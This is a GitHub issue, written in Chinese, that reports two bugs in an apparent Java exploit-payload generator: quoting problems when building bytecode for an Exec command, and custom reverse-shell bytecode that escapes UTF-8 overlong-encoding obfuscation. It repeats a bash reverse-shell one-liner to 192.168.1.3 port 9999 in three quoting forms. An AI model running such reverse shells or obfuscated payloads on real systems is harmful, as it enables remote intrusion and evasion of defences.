Skip to content

反馈两个bug #15

@jlkl

Description

@jlkl

最新docker镜像版本

  1. JavaNativePayload -> BytecodeConvert -> Exec下命令填写遇到双引号、单引号生成字节码会出现问题
    双引号情况:bash -c "bash -i >& /dev/tcp/192.168.1.3/9999 0>&1"
Image 单引号情况:`bash -c 'bash -i >& /dev/tcp/192.168.1.3/9999 0>&1'` Image 试了下只有这种写法可以:`bash -c \"bash -i >& /dev/tcp/192.168.1.3/9999 0>&1\"`
  1. Utf8OverlongEncoding提示支持在 UserCustomByteXXX 自定义字节流中进行混淆,发现自定义字节码流后仍未被Utf8OverlongEncoding混淆。
    这里以自带的reverseshell生成的字节码为例,使用BytecodeFromBase64自定义字节码-Base64字符串
Image 开启纯2字节 utf8 overlong encoding混淆后base64解码生成的内容发现自定义字节码部分未被混淆 Image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions